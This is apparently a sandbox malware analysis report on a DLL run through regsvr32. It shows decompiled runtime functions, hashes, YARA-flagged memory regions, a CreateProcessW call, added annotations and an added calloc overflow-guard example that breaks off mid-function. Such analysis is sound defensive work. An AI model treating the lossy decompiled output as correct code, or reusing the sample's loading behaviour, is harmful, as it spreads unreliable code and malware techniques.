                                                                                                  • Instruction ID: b6e53cf5b86ad0bbbb970cc31562bd10e8c04adf062630b49de63bb5cf6c86ba
                                                                                                  • Opcode Fuzzy Hash: e9a861555d927ec3db92d1fa6852e06d9629cb263f7a81f544b384a165a1d9b2
                                                                                                  • Instruction Fuzzy Hash: 0E521730618B498BD71ADF19D8857BAB7F0FB94304F14462DE88BC7251DB74E982CB86
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385096906.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e01000_regsvr32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: #Vk$$$8$U[$W(P$_L$_o$k|$xD
                                                                                                  • API String ID: 0-383957222
                                                                                                  • Opcode ID: 3fcaeefa4f3a6a4b2ee736f46ed5ab809e6beb52b42741c15c6946b5de4ec314
                                                                                                  • Instruction ID: 0a2479bcbc74cd76bba4b0ead00458f7974802fcca51e4ffa8e139c050d02338
                                                                                                  • Opcode Fuzzy Hash: 3fcaeefa4f3a6a4b2ee736f46ed5ab809e6beb52b42741c15c6946b5de4ec314
                                                                                                  • Instruction Fuzzy Hash: E1C1DD71519780AFD388CF28C58A91BBBF0FBD4754F906A1DF882862A0D7B4D949CF02
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385398518.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.385391498.0000000180000000.00000002.00000001.01000000.00000008.sdmp
                                                                                                  • Associated: 00000003.00000002.385413006.0000000180016000.00000002.00000001.01000000.00000008.sdmp
                                                                                                  • Associated: 00000003.00000002.385422599.0000000180021000.00000004.00000001.01000000.00000008.sdmp
                                                                                                  • Associated: 00000003.00000002.385427672.0000000180023000.00000002.00000001.01000000.00000008.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AccessAllocateFindMemoryResourceResource_Virtual
                                                                                                  • String ID: @$LXGUM$ad5zS&E7DS(ke9?+qbAC5tqx<Y<h0!QB4H3bk
                                                                                                  • API String ID: 2485490239-3005932707
                                                                                                  • Opcode ID: 72763dadedb1f7e12bf326a7682b4cc9f3b8809a7beac6fa455c8e22944c1181
                                                                                                  • Instruction ID: 10e411743ffb1a55a6adb62272a00c62f4f605c25ab8d9ba5168281e261d5f46
                                                                                                  • Opcode Fuzzy Hash: 72763dadedb1f7e12bf326a7682b4cc9f3b8809a7beac6fa455c8e22944c1181
                                                                                                  • Instruction Fuzzy Hash: 0F41F976218B8486D795CB14F49039AB7B4F388794F505116FADA83BA8DF7DC608CB00
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385096906.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e01000_regsvr32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: )s$)y_$3`d!$GX$lo$=
                                                                                                  • API String ID: 0-308291206
                                                                                                  • Opcode ID: fde852a4840d2e352ca3eb00ee2f42bd1f44b3ef619014c8955ce582878b56b5
                                                                                                  • Instruction ID: de9619a5d3a49ac7ed2ddff751318166f777ec5c945e06ac463f3725cd0ec5ba
                                                                                                  • Opcode Fuzzy Hash: fde852a4840d2e352ca3eb00ee2f42bd1f44b3ef619014c8955ce582878b56b5
                                                                                                  • Instruction Fuzzy Hash: C7913A7190074A8BDB48CF28D88A4DE3FB1FB58358F65522CEC4AA6290D778D995CFC4
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385096906.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e01000_regsvr32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: /Q$;$F8$KT$F$Z
                                                                                                  • API String ID: 0-1951868783
                                                                                                  • Opcode ID: 1dba0b1f5f7bf25f1a94850d34f322108ec8c8f6f4ebff0ec6ff6f465611ff96
                                                                                                  • Instruction ID: 563ee7ee4650cf74338cb07fa4ef2de832ac3da53813dd0267dc11f7e7c685b1
                                                                                                  • Opcode Fuzzy Hash: 1dba0b1f5f7bf25f1a94850d34f322108ec8c8f6f4ebff0ec6ff6f465611ff96
                                                                                                  • Instruction Fuzzy Hash: FF6135B0E147098FCB48CFA8D88A8DEBBB1FB58314F10821DE856A7290D7749995CF95
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  C-Code - Quality: 37%
                                                                                                  			E00000001180010AC0(long long _a8, intOrPtr _a16, long long _a24) {
                                                                                                  				long long _v32;
                                                                                                  				long long _v40;
                                                                                                  				intOrPtr _v48;
                                                                                                  				intOrPtr _v52;
                                                                                                  				intOrPtr _v56;
                                                                                                  				intOrPtr _t15;
                                                                                                  				long long _t19;
                                                                                                  				long long _t20;
                                                                                                  
                                                                                                  				_a24 = _t20;
                                                                                                  				_a16 = _t15;
                                                                                                  				_a8 = _t19;
                                                                                                  				_v56 = _a16;
                                                                                                  				if (_v56 == 1) goto 0x80010ae6;
                                                                                                  				goto 0x80010bf4;
                                                                                                  				 *0x80022ca0 = _a8;
                                                                                                  				_v52 = 0x904;
                                                                                                  				_v48 = 0xf9e;
                                                                                                  				_v40 = 0;
                                                                                                  				_v32 = 0;
                                                                                                  				if (E00000001180010DB0(_a16) == 0) goto 0x80010b28;
                                                                                                  				ExitProcess(??);
                                                                                                  			}

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385398518.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.385391498.0000000180000000.00000002.00000001.01000000.00000008.sdmp
                                                                                                  • Associated: 00000003.00000002.385413006.0000000180016000.00000002.00000001.01000000.00000008.sdmp
                                                                                                  • Associated: 00000003.00000002.385422599.0000000180021000.00000004.00000001.01000000.00000008.sdmp
                                                                                                  • Associated: 00000003.00000002.385427672.0000000180023000.00000002.00000001.01000000.00000008.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ExitProcess
                                                                                                  • String ID:
                                                                                                  • API String ID: 621844428-0
                                                                                                  • Opcode ID: e7061396d7e3d43570edbd3d19f5eed90c055825c823b852da9f6b8b51899770
                                                                                                  • Instruction ID: 35b30a5bd3bbc3bfa3955963e6b6c4c9d1147ff83b5bb424c40f1a31c42fa1fb
                                                                                                  • Opcode Fuzzy Hash: e7061396d7e3d43570edbd3d19f5eed90c055825c823b852da9f6b8b51899770
                                                                                                  • Instruction Fuzzy Hash: AE311671119B489AE782DF54F85438AB7A0F7983D4F608215F6A907BA4CFBDC24CCB40
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385096906.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e01000_regsvr32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: 0c$\$c2&
                                                                                                  • API String ID: 0-1001447681
                                                                                                  • Opcode ID: 77759940156d6b552e519a0717cd81e7aca00c005acef3af4df6aa899143340c
                                                                                                  • Instruction ID: 12d05c21780020c91da449286fd61834eaf809783b94149dec656bd1dc5995f1
                                                                                                  • Opcode Fuzzy Hash: 77759940156d6b552e519a0717cd81e7aca00c005acef3af4df6aa899143340c
                                                                                                  • Instruction Fuzzy Hash: 8902F8711093C88BEBBECF64C8896DE7BADFB44708F10521DEA4A9E298DB745744CB41
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385096906.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e01000_regsvr32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: .f$M$N5
                                                                                                  • API String ID: 0-1477915503
                                                                                                  • Opcode ID: 8d1225c7070edb932c8417e1bce8c420d426fdb0b99d3cf29e08fc417a96cbbc
                                                                                                  • Instruction ID: 85271a9a26c86974248584b084a67de3d1f629aafe1334be9fd29fc2e4898462
                                                                                                  • Opcode Fuzzy Hash: 8d1225c7070edb932c8417e1bce8c420d426fdb0b99d3cf29e08fc417a96cbbc
                                                                                                  • Instruction Fuzzy Hash: 32A194701197449FD7A8DF28C9C959EBBF0FB94304F906A1DF8869B2A0CB74D985CB42
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385096906.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e01000_regsvr32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: A]jN
                                                                                                  • API String ID: 0-1761522205
                                                                                                  • Opcode ID: 43702ad7ebc926fc841c635a5fc759035faaa4ad2df4e1132c12a3653d9fa51d
                                                                                                  • Instruction ID: 1076f03cbd1e16a6891d472ed48519b24639b71f194074d393ca8cf68a845b0f
                                                                                                  • Opcode Fuzzy Hash: 43702ad7ebc926fc841c635a5fc759035faaa4ad2df4e1132c12a3653d9fa51d
                                                                                                  • Instruction Fuzzy Hash: 45D1E4B1E0060A8FDF48DFA8C49A4AEBBB1FB58304F11422DD556BB290D7785A46CFD1
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385096906.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e01000_regsvr32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: C
                                                                                                  • API String ID: 0-3705061908
                                                                                                  • Opcode ID: 762938c9acd95b28f04d4807fb9ee99926cdc57d0bffae28badc71fa18101beb
                                                                                                  • Instruction ID: 023a5d9a26f4529b0d0faf9e1c8388ddf004ec2b26809c8a273a475d2bd9165d
                                                                                                  • Opcode Fuzzy Hash: 762938c9acd95b28f04d4807fb9ee99926cdc57d0bffae28badc71fa18101beb
                                                                                                  • Instruction Fuzzy Hash: 9761E07151C7848BD768DF28C18A40FBBF1FBD6748F000A1DF69A862A0D7B6D958CB42
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

C-Code - Quality: 100%
E0000000118000147C(void* __edx) {
    void* _t5;

    _t5 = __edx;
    if (_t5 == 0) goto 0x800014bd;
    if (_t5 == 0) goto 0x800014b1;
    if (_t5 == 0) goto 0x800014a4;
    if (__edx == 1) goto 0x8000149d;
    return 1;
}

0x180001480
0x180001482
0x180001487
0x18000148c
0x180001491
0x18000149c

APIs
Memory Dump Source
• Source File: 00000003.00000002.385398518.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000003.00000002.385391498.0000000180000000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000003.00000002.385413006.0000000180016000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000003.00000002.385422599.0000000180021000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000003.00000002.385427672.0000000180023000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
Similarity
• API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
• String ID:
• API String ID: 190073905-0
• Opcode ID: f481a242433e045de9421f6a540d64c2f1c4067185df5e2b4ea36506bf633cb0
• Instruction ID: c036cf0e1e542974e7afb98f421e14e504817ee7e551922961311e630d73ddb8
• Opcode Fuzzy Hash: f481a242433e045de9421f6a540d64c2f1c4067185df5e2b4ea36506bf633cb0
• Instruction Fuzzy Hash: 5881C370A04A4DCEFBD7DB65A8413D932A0AB9D7C2F54C125B909477A6DF38C74D8700
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

C-Code - Quality: 71%
E000000011800063CC(void* __ecx, intOrPtr* __rax, long long __rbx, void* __rcx, void* __r8, long long _a8, signed int _a16, signed int _a24, signed int _a32) {
    long long _v56;
    void* __rdi;
    void* __rsi;
    void* __rbp;
    void* _t31;
    intOrPtr _t37;
    void* _t50;
    intOrPtr* _t67;
    long long _t73;
    void* _t75;
    long long _t89;
    signed int _t90;
    void* _t91;
    intOrPtr* _t92;
    void* _t95;
    void* _t98;

    _t98 = __r8;
    _t75 = __rcx;
    _a8 = __rbx;
    r14d = __ecx;
    if (__ecx == 0) goto 0x8000653f;
    _t2 = _t75 - 1; // -1
    if (_t2 - 1 <= 0) goto 0x8000640a;
    E000000011800086F4(_t2 - 1, __rax);
    _t3 = _t90 + 0x16; // 0x16
     *__rax = _t3;
    E000000011800085B8();
    goto 0x8000653f;
    E00000001180009CD8(_t50, __rbx, _t91);
    r8d = 0x104;
    E000000011800093BC(_t50, 0x80022250, _t75, 0x80022250, _t90, _t91, _t98);
    _t92 =  *0x80022630; // 0xcd3350
     *0x80022610 = 0x80022250;
    if (_t92 == 0) goto 0x8000643e;
    if ( *_t92 != dil) goto 0x80006441;
    _t67 =  &_a32;
    _a24 = _t90;
    _v56 = _t67;
    r8d = 0;
    _a32 = _t90;
    _t31 = E000000011800061A4(0x80022250, 0x80022250, 0x80022250, 0x80022250, _t95, _t98,  &_a24);
    r8d = 1;
    E0000000118000636C(_t31, _a24, _a32, _t98); // executed
    _t73 = _t67;
    if (_t67 != 0) goto 0x80006499;
    E000000011800086F4(_t67, _t67);
     *_t67 = 0xc;
    E0000000118000878C(_t67, _a24);
    goto 0x80006403;
    _v56 =  &_a32;
    E000000011800061A4(_t73, 0x80022250, _t73, 0x80022250, _t95, _t67 + _a24 * 8,  &_a24);
    if (r14d != 1) goto 0x800064d1;
    _t37 = _a24 - 1;
     *0x80022620 = _t73;
     *0x80022618 = _t37;
    goto 0x8000653a;
    _a16 = _t90;
    0x80009298();
    if (_t37 == 0) goto 0x80006500;
    E0000000118000878C( &_a32, _a16);
    _a16 = _t90;
    E0000000118000878C( &_a32, _t73);
    goto 0x8000653f;
    _t89 = _a16;
    if ( *_t89 == _t90) goto 0x8000651b;
    if ( *((intOrPtr*)(_t89 + 8)) != _t90) goto 0x8000650f;
     *0x80022618 = 0;
    _a16 = _t90;
     *0x80022620 = _t89;
    E0000000118000878C(_t89 + 8, _t90 + 1);
    _a16 = _t90;
    E0000000118000878C(_t89 + 8, _t73);
    return _t37;
}

0x1800063cc
0x1800063cc
0x1800063cc
0x1800063e1
0x1800063e6
0x1800063ec
0x1800063f2
0x1800063f4
0x1800063f9
0x1800063fc
0x1800063fe
0x180006405
0x18000640a
0x180006416
0x180006421
0x180006426
0x18000642d
0x180006437
0x18000643c
0x180006441
0x180006445
0x18000644d
0x180006452
0x180006455
0x18000645e
0x180006467
0x180006474
0x180006479
0x18000647f
0x180006481
0x18000648d
0x18000648f
0x180006494
0x1800064ab
0x1800064b0
0x1800064b9
0x1800064be
0x1800064c0
0x1800064c7
0x1800064cf
0x1800064d5
0x1800064dc
0x1800064e5
0x1800064eb
0x1800064f3
0x1800064f7
0x1800064fe
0x180006500
0x18000650d
0x180006519
0x18000651b
0x180006523
0x180006527
0x18000652e
0x180006536
0x18000653a
0x180006551

APIs
• _invalid_parameter_noinfo.LIBCMT ref: 00000001800063FE
  • Part of subcall function 000000018000878C: HeapFree.KERNEL32(?,?,00000000,000000018000E6BE,?,?,?,000000018000E6FB,?,?,00000000,000000018000BED5,?,?,?,000000018000BE07), ref: 00000001800087A2
  • Part of subcall function 000000018000878C: GetLastError.KERNEL32(?,?,00000000,000000018000E6BE,?,?,?,000000018000E6FB,?,?,00000000,000000018000BED5,?,?,?,000000018000BE07), ref: 00000001800087AC
Strings
Memory Dump Source
• Source File: 00000003.00000002.385398518.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000003.00000002.385391498.0000000180000000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000003.00000002.385413006.0000000180016000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000003.00000002.385422599.0000000180021000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000003.00000002.385427672.0000000180023000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
Similarity
• API ID: ErrorFreeHeapLast_invalid_parameter_noinfo
• String ID: C:\Windows\system32\regsvr32.exe
• API String ID: 2724796048-464481000
• Opcode ID: 6ab70c768575c3897d89b9d56517bfe78e9b9e214d555ff294bd8044b7c9c220
• Instruction ID: 22eee0821ddd0031139ae0324638ff7f0a91ab2d69636e8f5a4f0751baae73e2
• Opcode Fuzzy Hash: 6ab70c768575c3897d89b9d56517bfe78e9b9e214d555ff294bd8044b7c9c220
• Instruction Fuzzy Hash: C4418B36601B1896FB97DF65A8403EC3795FB4CBC4F588025FE4A43BAADE34C6898340
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 415 e13988-e13a3e call e19f38 418 e13a44-e13ac6 call e0a940 415->418 419 e13acc-e13b12 CreateProcessW 415->419 418->419
APIs
Strings
Memory Dump Source
• Source File: 00000003.00000002.385096906.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E01000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_e01000_regsvr32.jbxd
Yara matches
Similarity
• API ID: CreateProcess
• String ID: li
• API String ID: 963392458-3170889640
• Opcode ID: df447d1959c748b5d8cf34ebfef7c4b31b83bdbcb52bf56f40cb8f0245456118
• Instruction ID: d839ad2b4f760bd153dad1667095716b37939a69d97365ea8d2e729e018dee4e
• Opcode Fuzzy Hash: df447d1959c748b5d8cf34ebfef7c4b31b83bdbcb52bf56f40cb8f0245456118
• Instruction Fuzzy Hash: F841E77091C7848FDB64DF18D0C97DAB7E0FB98315F10495DE488C7296CB789884CB86
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 422 18000d26c-18000d289 423 18000d2b4-18000d2c1 call 180008160 422->423 424 18000d28b-18000d29c call 1800086f4 call 1800085b8 422->424 429 18000d2c7-18000d2ce 423->429 437 18000d29e-18000d2b3 424->437 431 18000d306-18000d312 call 1800081b4 429->431 432 18000d2d0-18000d2db 429->432 431->437 434 18000d2dd 432->434 435 18000d2df call 18000d174 432->435 438 18000d301-18000d304 434->438 441 18000d2e4-18000d2eb 435->441 438->429 442 18000d2f2-18000d2fb 441->442 443 18000d2ed-18000d2f0 441->443 442->438 443->431
C-Code - Quality: 100%
E0000000118000D26C(void* __ecx, intOrPtr* __rax, long long __rbx, long long __rdi, long long __rsi, long long _a8, long long _a16, long long _a24) {

    _a8 = __rbx;
    _a16 = __rsi;
    _a24 = __rdi;
    if (__ecx - 0x2000 < 0) goto 0x8000d2b4;
    E000000011800086F4(__ecx - 0x2000, __rax);
     *__rax = 9;
    E000000011800085B8();
    return 9;
}

0x18000d26c
0x18000d271
0x18000d276
0x18000d289
0x18000d28b
0x18000d295
0x18000d297
0x18000d2b3

APIs
Memory Dump Source
• Source File: 00000003.00000002.385398518.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.385391498.0000000180000000.00000002.00000001.01000000.00000008.sdmp
                                                                                                  • Associated: 00000003.00000002.385413006.0000000180016000.00000002.00000001.01000000.00000008.sdmp
                                                                                                  • Associated: 00000003.00000002.385422599.0000000180021000.00000004.00000001.01000000.00000008.sdmp
                                                                                                  • Associated: 00000003.00000002.385427672.0000000180023000.00000002.00000001.01000000.00000008.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                  • String ID:
                                                                                                  • API String ID: 3215553584-0
                                                                                                  • Opcode ID: b2bec9f1c83fd2e5dff941a4990122d97467662781677e8ba2cfdbb0e4efa737
                                                                                                  • Instruction ID: 290c2a04846c9b039a5155463e3184fcb060a742c36b4207bfb39a2b49eb85f2
                                                                                                  • Opcode Fuzzy Hash: b2bec9f1c83fd2e5dff941a4990122d97467662781677e8ba2cfdbb0e4efa737
                                                                                                  • Instruction Fuzzy Hash: 3911AC3210468C82F383DF14E8507D9B7A4FB5C7C0F058426FA9547BAADF38CA199B50
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  Basic blocks (id: address range, call) and their successors, recovered from the rendered graph:
                                                                                                  • 444: 180008714-180008723 -> 445, 446
                                                                                                  • 445: 180008733-180008743 -> 448
                                                                                                  • 446: 180008725-180008731 -> 445, 447
                                                                                                  • 447: 180008776-180008781, call 1800086f4 -> 452
                                                                                                  • 448: 18000875a-180008772, RtlAllocateHeap -> 449, 450
                                                                                                  • 449: 180008774 -> 452
                                                                                                  • 450: 180008745-18000874c, call 18000c08c -> 447, 456
                                                                                                  • 452: 180008783-180008788
                                                                                                  • 456: 18000874e-180008758, call 18000abf8 -> 447, 448
                                                                                                  C-Code - Quality: 44%
                                                                                                  			E00000001180008714(void* __eax, signed int __rcx, signed int __rdx) {
                                                                                                  				void* __rbx;
                                                                                                  				intOrPtr* _t22;
                                                                                                  				signed int _t29;
                                                                                                  
                                                                                                  				_t29 = __rdx; // rcx = element count, rdx = element size; the structure below matches the UCRT _calloc_base
                                                                                                  				if (__rcx == 0) goto 0x80008733; // count == 0: skip the overflow check (targets print without the leading 0x1 of 0x180008733)
                                                                                                  				_t1 = _t29 - 0x20; // -32 = 0xFFFFFFFFFFFFFFE0, the x64 UCRT _HEAP_MAXREQ, the largest request the heap accepts
                                                                                                  				_t22 = _t1;
                                                                                                  				if (_t22 - __rdx < 0) goto 0x80008776; // if (_HEAP_MAXREQ / count < size): count * size would wrap, take the ENOMEM path
                                                                                                  				_t25 =  ==  ? _t22 : __rcx * __rdx; // block_size = count * size, rounded up to 1 when the product is 0 (the decompiler lost the condition)
                                                                                                  				goto 0x8000875a;
                                                                                                  				if (E0000000118000C08C() == 0) goto 0x80008776; // allocation-failure retry loop: _query_new_mode() ...
                                                                                                  				if (E0000000118000ABF8(_t22,  ==  ? _t22 : __rcx * __rdx,  ==  ? _t22 : __rcx * __rdx) == 0) goto 0x80008776; // ... and _callnewh(block_size); give up when either returns 0
                                                                                                  				RtlAllocateHeap(??, ??, ??); // executed; arguments not recovered by the decompiler, calloc passes (crt heap, HEAP_ZERO_MEMORY, block_size)
                                                                                                  				if (_t22 == 0) goto 0x80008745; // NULL: back to the new-handler loop above
                                                                                                  				goto 0x80008783; // success: return the zeroed block
                                                                                                  				E000000011800086F4(_t22, _t22); // _errno()
                                                                                                  				 *_t22 = 0xc; // errno = ENOMEM (12)
                                                                                                  				return 0;
                                                                                                  			}






                                                                                                  0x180008714
                                                                                                  0x180008723
                                                                                                  0x180008727
                                                                                                  0x180008727
                                                                                                  0x180008731
                                                                                                  0x18000873f
                                                                                                  0x180008743
                                                                                                  0x18000874c
                                                                                                  0x180008758
                                                                                                  0x180008769
                                                                                                  0x180008772
                                                                                                  0x180008774
                                                                                                  0x180008776
                                                                                                  0x18000877b
                                                                                                  0x180008788

                                                                                                  APIs
                                                                                                  • RtlAllocateHeap.NTDLL(?,?,00000000,0000000180007F92,?,?,00005388A1408558,00000001800086FD,?,?,?,?,000000018000D08A,?,?,00000000), ref: 0000000180008769
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385398518.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.385391498.0000000180000000.00000002.00000001.01000000.00000008.sdmp
                                                                                                  • Associated: 00000003.00000002.385413006.0000000180016000.00000002.00000001.01000000.00000008.sdmp
                                                                                                  • Associated: 00000003.00000002.385422599.0000000180021000.00000004.00000001.01000000.00000008.sdmp
                                                                                                  • Associated: 00000003.00000002.385427672.0000000180023000.00000002.00000001.01000000.00000008.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AllocateHeap
                                                                                                  • String ID:
                                                                                                  • API String ID: 1279760036-0
                                                                                                  • Opcode ID: 7cf3c04cd0eb283655c87112c6735f3b789bd4b36bb41325690c7ae62c9b4c65
                                                                                                  • Instruction ID: 66bea78d34406d615fa8c08e42eaa36a882f8058afe23dfc71e7ff7acb685faa
                                                                                                  • Opcode Fuzzy Hash: 7cf3c04cd0eb283655c87112c6735f3b789bd4b36bb41325690c7ae62c9b4c65
                                                                                                  • Instruction Fuzzy Hash: A1F06D74309A0881FED7D7A599003D522D16F5CBC0F2CD4302D4E863DAEE1CC788A320
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%
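The decompiled function at 0x180008714 above is the report's view of a calloc-style allocator: the "-32" constant, the division-based check before the multiply, and the errno 0xc path are the count*size overflow guard. Since the decompiler garbled the ternary and dropped the RtlAllocateHeap arguments, here is an added example, not code from the Joe Sandbox report or from the sample, that shows the unguarded multiply beside the guarded form the decompile implements. It assumes the x64 value 0xFFFFFFFFFFFFFFE0 for the maximum heap request (the UCRT's _HEAP_MAXREQ) and uses malloc plus memset in place of RtlAllocateHeap with HEAP_ZERO_MEMORY.

```c
/* Added example, not code from the Joe Sandbox report or from the sample:
 * the count*size overflow guard that the decompiled function at 0x180008714
 * applies before calling RtlAllocateHeap, shown next to the unguarded form.
 * 0xFFFFFFFFFFFFFFE0 is the value the decompiler prints as "-32"; it is the
 * x64 UCRT's _HEAP_MAXREQ, the largest request the heap accepts (assumed here). */
#include <errno.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define HEAP_MAXREQ 0xFFFFFFFFFFFFFFE0ULL

/* Unguarded form: the multiplication wraps silently, so a request for
 * 2^63 elements of 4 bytes asks the heap for 0 bytes and "succeeds". */
static size_t naive_block_size(size_t count, size_t size)
{
    return count * size;
}

/* Guarded form mirroring the decompiled logic:
 *   if (count != 0 && HEAP_MAXREQ / count < size) -> fail, errno = ENOMEM (12)
 *   block_size = count * size, rounded up to 1 so a zero-length request still
 *   yields a distinct block (the "== ? : count * size" the decompiler garbled).
 * Returns the block size, or 0 on overflow (0 is never a valid result here). */
static size_t guarded_block_size(size_t count, size_t size)
{
    if (count != 0 && HEAP_MAXREQ / count < size) {
        errno = ENOMEM;
        return 0;
    }
    size_t n = count * size;
    return n == 0 ? 1 : n;
}

/* calloc-style wrapper: malloc + memset stand in for RtlAllocateHeap with HEAP_ZERO_MEMORY. */
static void *guarded_calloc(size_t count, size_t size)
{
    size_t n = guarded_block_size(count, size);
    if (n == 0)
        return NULL;
    void *p = malloc(n);
    if (p != NULL)
        memset(p, 0, n);
    return p;
}

/* Allocate, verify every byte is zero, free; returns 1 on success, 0 on any failure. */
static int calloc_is_zeroed(size_t count, size_t size)
{
    unsigned char *p = guarded_calloc(count, size);
    if (p == NULL)
        return 0;
    size_t n = guarded_block_size(count, size);
    int ok = 1;
    for (size_t i = 0; i < n; i++)
        if (p[i] != 0) ok = 0;
    free(p);
    return ok;
}

int main(void)
{
    size_t huge = SIZE_MAX / 2 + 1;   /* 2^63 on a 64-bit build */
    printf("naive   : 2^63 * 4 = %zu bytes (wrapped to zero)\n", naive_block_size(huge, 4));
    printf("guarded : 2^63 * 4 = %zu (0 = rejected, errno %d)\n", guarded_block_size(huge, 4), errno);
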